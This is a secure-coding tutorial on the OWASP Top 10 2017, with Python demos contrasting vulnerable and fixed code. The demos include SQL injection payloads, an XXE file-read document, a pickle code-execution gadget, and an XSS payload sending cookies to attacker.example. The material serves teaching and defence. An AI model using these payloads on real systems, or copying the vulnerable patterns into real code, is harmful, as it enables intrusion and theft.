OWASP TOP 10 2017
The OWASP Top 10 2017 was released in 2017. It lists the ten most critical security risks to web applications, ranked from data contributed by the security community, and for each one gives examples of how the weakness is exploited and how to prevent it.
A01:2017 - Injection
Example - SQL Injection, OS Command Injection
Injection covers the insertion of SQL, NoSQL, OS command or LDAP syntax into a web application through any input it accepts: form fields, URL parameters, headers, cookies. The flaw arises when untrusted data is concatenated into a query or command without validation or proper escaping, so the attacker's input is interpreted as part of the query (or command) instead of as plain data. The reliable defence is to keep data and code separate: parameterised queries, prepared statements, or an API that never builds the command text from input.
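The following added example (not part of the original page or of OWASP's material) shows the injection described above against a constructed SQLite database. The vulnerable login builds its SQL by string formatting; the safe version uses a parameterised query. Two classic payloads are tried: a comment marker that discards the password check and a tautology. The table, account and passwords are all made up for the demo; a real application would of course store password hashes, not plaintext.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed sample database: one users table with a single account."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT, role TEXT)")
    conn.execute("INSERT INTO users VALUES ('alice', 'correct horse', 'admin')")
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> bool:
    # The query text is built from the input, so quotes in the input become SQL.
    query = (f"SELECT role FROM users WHERE username = '{username}' "
             f"AND password = '{password}'")
    return conn.execute(query).fetchone() is not None


def login_safe(conn: sqlite3.Connection, username: str, password: str) -> bool:
    # Parameterised query: the driver passes the values separately from the SQL
    # text, so a quote in the input can never terminate the string literal.
    query = "SELECT role FROM users WHERE username = ? AND password = ?"
    return conn.execute(query, (username, password)).fetchone() is not None


def demo() -> dict:
    conn = make_db()
    # Payload 1: "--" starts an SQL comment, so "AND password = ..." is dropped.
    comment_user = "alice'--"
    # Payload 2: tautology; AND binds tighter than OR, so the OR makes the
    # whole WHERE clause true for every row.
    tautology_pw = "x' OR '1'='1"
    return {
        "legit_vulnerable": login_vulnerable(conn, "alice", "correct horse"),
        "attack_comment_vulnerable": login_vulnerable(conn, comment_user, "anything"),
        "attack_tautology_vulnerable": login_vulnerable(conn, "nobody", tautology_pw),
        "legit_safe": login_safe(conn, "alice", "correct horse"),
        "attack_comment_safe": login_safe(conn, comment_user, "anything"),
        "attack_tautology_safe": login_safe(conn, "nobody", tautology_pw),
    }


if __name__ == "__main__":
    for name, result in demo().items():
        print(f"{name}: logged in = {result}")
```

Both payloads log in as alice through the vulnerable function and fail through the parameterised one, because in the safe version the string `alice'--` is compared literally against the username column and simply does not match.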
A02:2017 - Broken Authentication
Example - Missing Session Timeout, Credential Stuffing
Here an attacker exploits weaknesses in the login or session handling to impersonate a legitimate user. The flaws are most often found in session management (session IDs exposed in URLs, not rotated after login, not expired on logout or after inactivity) and in credential management (weak or default passwords, no defence against credential stuffing and brute force). A broken authentication flaw lets the attacker hijack a session ID or obtain valid login credentials.
A03:2017 - Sensitive Data Exposure
Example - Unencrypted Data
Sensitive Data Exposure is also known as information disclosure or leakage. It occurs when a web application fails to protect sensitive data such as passwords, card numbers or personal records: sending it over plain HTTP, storing it unencrypted or with weak hashing, or returning it to users who have no right to view it.
A04:2017 - XML External Entities (XXE)
Example - File Retrieval, Blind XXE
This flaw affects web applications that accept and parse XML input. If the XML parser is configured to resolve external entities, the attacker submits a document whose DTD (Document Type Definition) declares an entity pointing at a local file or a URL; the parser fetches that resource and substitutes its content into the document. This lets the attacker read files on the application server and interact with any backend or external system the server can reach, which is why XXE can be escalated to SSRF (Server Side Request Forgery). The vulnerability lies in how the XML is parsed, not in the application logic: any parser that processes DTDs and external entities without that feature being disabled is exposed. In blind XXE the substituted content is not shown in the response, so the attacker exfiltrates it through an out-of-band channel, typically a DNS or HTTP request to a server they control.
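The following added example (not from the original page or from OWASP) demonstrates the file retrieval case above with Python's standard-library `xml.sax` parser. The parser's `feature_external_ges` flag controls whether SYSTEM entities are fetched; it is off by default in current Python releases, and the demo turns it on to reproduce the insecure configuration. The secret file, its content and the order document are constructed for the demo; the entity's SYSTEM identifier is a `file://` URL, so the demo assumes a POSIX filesystem.

```python
import io
import os
import pathlib
import tempfile
import xml.sax
from xml.sax.handler import ContentHandler, feature_external_ges


class TextCollector(ContentHandler):
    """Collects character data, like an application reading <name> from an order."""

    def __init__(self):
        super().__init__()
        self.parts = []

    def characters(self, content):
        self.parts.append(content)


def parse_name(xml_bytes: bytes, resolve_external_entities: bool) -> str:
    parser = xml.sax.make_parser()
    # True reproduces the insecure configuration: the parser will open the
    # SYSTEM identifier of any external general entity and inline its content.
    parser.setFeature(feature_external_ges, resolve_external_entities)
    handler = TextCollector()
    parser.setContentHandler(handler)
    parser.parse(io.BytesIO(xml_bytes))
    return "".join(handler.parts).strip()


def xxe_payload(target_file: str) -> bytes:
    """Constructed attacker document: an internal DTD subset declares an
    entity backed by a local file, then references it inside <name>."""
    uri = pathlib.Path(target_file).as_uri()  # file:///.../secret.txt
    return (
        '<?xml version="1.0"?>\n'
        "<!DOCTYPE order [\n"
        f'  <!ENTITY xxe SYSTEM "{uri}">\n'
        "]>\n"
        "<order><name>&xxe;</name></order>"
    ).encode()


def demo() -> tuple:
    with tempfile.TemporaryDirectory() as tmp:
        secret = os.path.join(tmp, "secret.txt")
        with open(secret, "w") as f:
            f.write("db_password=hunter2")  # constructed secret, stands in for /etc/passwd
        payload = xxe_payload(secret)
        leaked = parse_name(payload, resolve_external_entities=True)
        blocked = parse_name(payload, resolve_external_entities=False)
    return leaked, blocked


if __name__ == "__main__":
    leaked, blocked = demo()
    print("external entities enabled :", repr(leaked))
    print("external entities disabled:", repr(blocked))
```

With the feature enabled the application sees the file's content where it expected a customer name; with it disabled the entity reference expands to nothing. The same idea applies to every XML stack: find the parser option that loads DTDs and external entities and make sure it is switched off, or use a hardened wrapper such as `defusedxml`.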
A05:2017 - Broken Access Control
Example - Privilege Escalation, JWT Not Invalidated
Access control enforces what an authenticated user is permitted to do. When it is broken, an attacker acting as an ordinary user can reach functions and data reserved for others: viewing another user's records by changing an identifier in the URL, performing administrator actions, reading sensitive files, or changing access rights. Tokens such as JWTs that are not invalidated on logout keep granting access after the session should have ended.
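The following added example (not from the original page or from OWASP) shows the two failures named above in code: an insecure direct object reference, where an invoice is returned to whoever asks for its id, and a vertical privilege escalation, where a role value coming from the client is applied without checking who sent it. Users, invoices and roles are constructed for the demo; the `Forbidden` exception is a stand-in for whatever a real framework returns as HTTP 403.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class User:
    id: int
    role: str  # "user" or "admin"


# Constructed data: invoice id -> owner and amount.
INVOICES = {
    1001: {"owner_id": 1, "amount": 120.00},
    1002: {"owner_id": 2, "amount": 980.00},
}


class Forbidden(Exception):
    """Stand-in for an HTTP 403 response."""


def get_invoice_vulnerable(current_user: User, invoice_id: int) -> dict:
    """Checks only that someone is logged in. Any user can walk
    /invoices/1001, /invoices/1002, ... and read other customers' data."""
    return INVOICES[invoice_id]


def get_invoice_safe(current_user: User, invoice_id: int) -> dict:
    invoice = INVOICES[invoice_id]
    # Ownership is enforced server-side on every request; nothing in the URL
    # or the form is trusted to say who may read the record.
    if invoice["owner_id"] != current_user.id and current_user.role != "admin":
        raise Forbidden(f"user {current_user.id} may not read invoice {invoice_id}")
    return invoice


def set_role_vulnerable(current_user: User, target: User, new_role: str) -> User:
    """Applies a role submitted by the client, so a user can promote themselves."""
    return User(target.id, new_role)


def set_role_safe(current_user: User, target: User, new_role: str) -> User:
    if current_user.role != "admin":
        raise Forbidden("only administrators may change roles")
    if new_role not in ("user", "admin"):
        raise ValueError(f"unknown role {new_role!r}")
    return User(target.id, new_role)


def demo() -> dict:
    alice = User(id=1, role="user")
    bob = User(id=2, role="user")
    admin = User(id=99, role="admin")

    def attempt(fn, *args):
        try:
            return fn(*args)
        except Forbidden:
            return "forbidden"

    return {
        "idor_vulnerable": attempt(get_invoice_vulnerable, alice, 1002)["amount"],
        "idor_safe": attempt(get_invoice_safe, alice, 1002),
        "own_invoice_safe": attempt(get_invoice_safe, alice, 1001)["amount"],
        "admin_reads_any": attempt(get_invoice_safe, admin, 1002)["amount"],
        "escalation_vulnerable": attempt(set_role_vulnerable, alice, alice, "admin").role,
        "escalation_safe": attempt(set_role_safe, alice, alice, "admin"),
        "admin_sets_role": attempt(set_role_safe, admin, bob, "admin").role,
    }


if __name__ == "__main__":
    for name, result in demo().items():
        print(f"{name}: {result}")
```

The point of the safe versions is that the decision is made from server-side state (the invoice's owner, the caller's stored role), not from anything the request carries. Deny by default and log the refusals: repeated 403s from one account are a strong signal that someone is probing identifiers.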
A06:2017 - Security Misconfiguration
Example - Misconfigured HTTP Headers, Default Configuration
This happens when no hardened configuration has been applied to some layer of the platform: framework, application server, web server, database server, or the hosting environment itself. Typical cases are default accounts and passwords left in place, directory listing enabled, verbose error messages that reveal stack traces, sample applications or unused features left installed, and missing security headers. Automated scanners detect such weaknesses easily. A configuration flaw can give an attacker unauthorized access to system data or functionality and can end in complete compromise or shutdown of the system.
A07:2017 - Cross Site Scripting (XSS)
Example - Session Hijacking, Account Takeover, 2FA & MFA Bypass
Cross Site Scripting is a client side code injection attack. The attacker injects a malicious script, usually JavaScript, into a page that other users view. The script runs in the victim's browser with the full trust of the legitimate site, so it can redirect the victim to an attacker controlled site without their knowledge, steal cookies and session tokens, perform actions as the victim, or capture what the user types, including one-time codes. There are three types of XSS:
1. Reflected XSS
Reflected XSS is non-persistent: the attacker's payload is not stored anywhere. It happens when user input is reflected in an error message, a search result page, or any other response that includes some or all of the request data without first making that data safe to render in the browser. The victim has to be tricked into sending the crafted request, usually through a link.
2. Stored XSS
Stored XSS is persistent: the payload is saved on the web server or in the database. It usually occurs where user input is stored on the target server, such as a message forum, a comment field, or a profile. Every user who later views the page receives the stored data without it having been made safe to render in the browser, so a single injection affects all visitors.
3. DOM XSS (also called Type-0 XSS)
DOM XSS occurs when client-side JavaScript modifies the DOM based on user supplied input. The script reads data from a user-controllable source (for example location.hash, location.search or document.referrer) and passes it to a sink that interprets it as markup or code. Examples of sinks are innerHTML, document.write, eval and window.location. The payload never has to reach the server, so server-side filtering does not catch it.
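The following added example (not from the original page or from OWASP) shows the server-side half of the reflected and stored cases above in Python: a search page and a redirect link rendered with and without output encoding, plus a comment board that stores a payload and serves it to later visitors. It uses the standard library `html.escape`; the payload, field names and URLs are constructed for the demo. DOM XSS is not covered here because it lives entirely in browser-side JavaScript, where the fix is to avoid the dangerous sinks or use safe DOM APIs such as textContent.

```python
import html
from urllib.parse import urlparse

# Constructed attacker payload: sends the session cookie to an attacker host.
PAYLOAD = ("<script>new Image().src='https://attacker.example/c?'"
           "+document.cookie</script>")


def render_search_vulnerable(query: str) -> str:
    """Reflected XSS: the search term is echoed into the page as-is."""
    return f"<p>Results for: {query}</p>"


def render_search_safe(query: str) -> str:
    """Escape for the HTML text context so < > & \" ' become entities."""
    return f"<p>Results for: {html.escape(query)}</p>"


def render_redirect_vulnerable(next_url: str) -> str:
    """Attribute context: an unescaped quote breaks out of href=\"...\"."""
    return f'<a href="{next_url}">Continue</a>'


def render_redirect_safe(next_url: str) -> str:
    """Attribute context needs escaping AND URL validation: escaping alone
    would still let javascript:alert(1) through as a perfectly valid href."""
    parsed = urlparse(next_url)
    if parsed.scheme or parsed.netloc or not next_url.startswith("/"):
        next_url = "/"  # only same-site relative paths are accepted
    return f'<a href="{html.escape(next_url, quote=True)}">Continue</a>'


class CommentBoard:
    """Stored XSS: the payload is saved once and served to every later visitor."""

    def __init__(self):
        self.comments = []

    def post(self, author: str, text: str) -> None:
        self.comments.append((author, text))

    def render_vulnerable(self) -> str:
        return "".join(f"<li><b>{a}</b>: {t}</li>" for a, t in self.comments)

    def render_safe(self) -> str:
        # Escape at output time, for every field, every time the page is built.
        return "".join(
            f"<li><b>{html.escape(a)}</b>: {html.escape(t)}</li>"
            for a, t in self.comments
        )


def demo_stored() -> tuple:
    board = CommentBoard()
    board.post("alice", "Great product!")
    board.post("mallory", PAYLOAD)
    return board.render_vulnerable(), board.render_safe()


if __name__ == "__main__":
    print(render_search_vulnerable(PAYLOAD))
    print(render_search_safe(PAYLOAD))
    print(render_redirect_vulnerable('" onmouseover="alert(1)'))
    print(render_redirect_safe("javascript:alert(1)"))
    for page in demo_stored():
        print(page)
```

Encoding has to match the context the data lands in: the text node encoding used for the search page is not enough inside an attribute, a URL, or a script block, which is why the redirect helper also validates the URL. Templating engines that auto-escape make the safe version the default, but only for the HTML text and attribute contexts.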
A08:2017 - Insecure Deserialization
Example - Remote Code Execution
Insecure deserialization occurs when a web application deserializes data that a user can control. Serialization formats such as Java serialized objects, PHP serialize() or Python pickle can describe not only data but which classes to instantiate and, through them, which code to run, so an attacker who can tamper with the serialized object can pass harmful data into the application code, change its logic, or reach Remote Code Execution (RCE). Because the attacker is injecting objects rather than plain values, the flaw is also called object injection.
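The following added example (not from the original page or from OWASP) reproduces the object injection above with Python's `pickle`. A constructed attacker class uses `__reduce__` to make the loader call `os.makedirs` on a path of the attacker's choosing; a real gadget would name `os.system` or `subprocess` in exactly the same way, which is why the harmless side effect is used here. The hardened loader overrides `Unpickler.find_class` so that no global is resolved, which is the standard-library recommended way to restrict what a pickle may instantiate. Paths and data are constructed for the demo.

```python
import io
import os
import pickle
import tempfile


class Gadget:
    """Constructed attacker object. pickle records the (callable, args) pair
    returned by __reduce__, and the victim's pickle.loads() calls it while
    rebuilding the object, so the attacker chooses what runs."""

    def __init__(self, path: str):
        self.path = path

    def __reduce__(self):
        return (os.makedirs, (self.path,))


class RestrictedUnpickler(pickle.Unpickler):
    """Refuses to resolve any global, so a blob can only carry plain data
    (dicts, lists, strings, numbers). Extend ALLOWED only with types you
    have reviewed; never with anything that can run code when constructed."""

    ALLOWED = set()  # e.g. {("collections", "OrderedDict")}

    def find_class(self, module, name):
        if (module, name) in self.ALLOWED:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"forbidden global {module}.{name}")


def loads_vulnerable(blob: bytes):
    return pickle.loads(blob)


def loads_restricted(blob: bytes):
    return RestrictedUnpickler(io.BytesIO(blob)).load()


def demo() -> dict:
    with tempfile.TemporaryDirectory() as tmp:
        target_a = os.path.join(tmp, "created_by_gadget")
        target_b = os.path.join(tmp, "blocked_gadget")

        loads_vulnerable(pickle.dumps(Gadget(target_a)))  # gadget runs here

        try:
            loads_restricted(pickle.dumps(Gadget(target_b)))
            blocked = False
        except pickle.UnpicklingError:
            blocked = True

        return {
            "gadget_ran": os.path.isdir(target_a),
            "restricted_blocked": blocked,
            "restricted_side_effect": os.path.isdir(target_b),
            "plain_data_ok": loads_restricted(
                pickle.dumps({"user": "alice", "ids": [1, 2]})),
        }


if __name__ == "__main__":
    for name, result in demo().items():
        print(f"{name}: {result}")
```

The restricted loader is a mitigation, not a cure: the safest design is to accept only a data-only format such as JSON from untrusted parties, and if a native serialization format must cross a trust boundary, to sign it and verify the signature before deserializing.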
A09:2017 - Using Components With Known Vulnerabilities
Example - Open Source Vulnerable Components
This risk arises when a developer uses a component, framework, library or other dependency that has a publicly known vulnerability, and that flaw can compromise the whole application. Components run with the same privileges as the application, so a flaw in one of them is as serious as a flaw in the application's own code. Exploiting such a component can lead to serious data loss or server takeover, and because the vulnerability and often a working exploit are public, attackers scan for it at scale.
A10:2017 - Insufficient Logging & Monitoring
Example - Missing Security Information, Missing Logs
Insufficient logging and monitoring means that security-relevant events (logins, failed logins, access control failures, input validation failures) are not recorded, or are recorded but never reviewed and never raise an alert. Ignoring warnings, errors and log messages is risky. Without logging and monitoring a web application cannot detect, escalate or alert on an active attack, and attackers rely on this to keep probing and pivoting unnoticed. A useful test is that penetration testing and vulnerability scans should trigger alerts; if they do not, the monitoring is insufficient.
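The following added example (not from the original page or from OWASP) shows the kind of detection that the monitoring above is meant to provide: it parses authentication log lines and raises an alert when one source IP accumulates a threshold of failed logins inside a sliding time window, which is what a credential stuffing run or a penetration tester's brute-force attempt looks like. The log format, IP addresses and events are constructed for the demo and are not the output of any real product.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed log format: "<iso timestamp> <client ip> <event> user=<name> status=<ok|fail>"
LOG_LINE = re.compile(
    r"^(?P<ts>\S+) (?P<ip>\S+) (?P<event>\w+) user=(?P<user>\S+) status=(?P<status>\w+)$"
)

# Constructed sample log: a credential stuffing burst from 198.51.100.9 and
# ordinary traffic from two other clients.
SAMPLE_LOG = """\
2017-11-20T10:00:01 203.0.113.5 login user=alice status=ok
2017-11-20T10:00:05 198.51.100.9 login user=admin status=fail
2017-11-20T10:00:06 198.51.100.9 login user=root status=fail
2017-11-20T10:00:07 198.51.100.9 login user=alice status=fail
2017-11-20T10:00:08 198.51.100.9 login user=bob status=fail
2017-11-20T10:00:09 198.51.100.9 login user=admin status=fail
2017-11-20T10:01:00 192.0.2.7 login user=carol status=fail
2017-11-20T10:01:30 192.0.2.7 login user=carol status=ok
"""


def detect_bruteforce(log_text: str, threshold: int = 5,
                      window: timedelta = timedelta(minutes=5)) -> list:
    """Return one alert per source IP that reaches `threshold` failed logins
    within any `window`-long interval."""
    failures = defaultdict(list)
    for line in log_text.splitlines():
        m = LOG_LINE.match(line)
        if not m:
            continue  # in production, count unparseable lines: they are a signal too
        if m["event"] == "login" and m["status"] == "fail":
            failures[m["ip"]].append(datetime.fromisoformat(m["ts"]))

    alerts = []
    for ip, times in failures.items():
        times.sort()
        start = 0
        for end in range(len(times)):
            # Slide the window start forward until it fits inside `window`.
            while times[end] - times[start] > window:
                start += 1
            count = end - start + 1
            if count >= threshold:
                alerts.append({"ip": ip, "count": count,
                               "first": times[start], "last": times[end]})
                break  # one alert per IP is enough to start an investigation
    return alerts


if __name__ == "__main__":
    for alert in detect_bruteforce(SAMPLE_LOG):
        print(f"ALERT {alert['ip']}: {alert['count']} failed logins "
              f"between {alert['first']} and {alert['last']}")
```

The rule only works if the application actually writes the failed-login event with a timestamp, the client address and the outcome, and if something reads the log in near real time. The same two-pointer window applies to other indicators, such as a burst of 403 responses from one account (access control probing) or requests for paths that do not exist on the site (scanner activity).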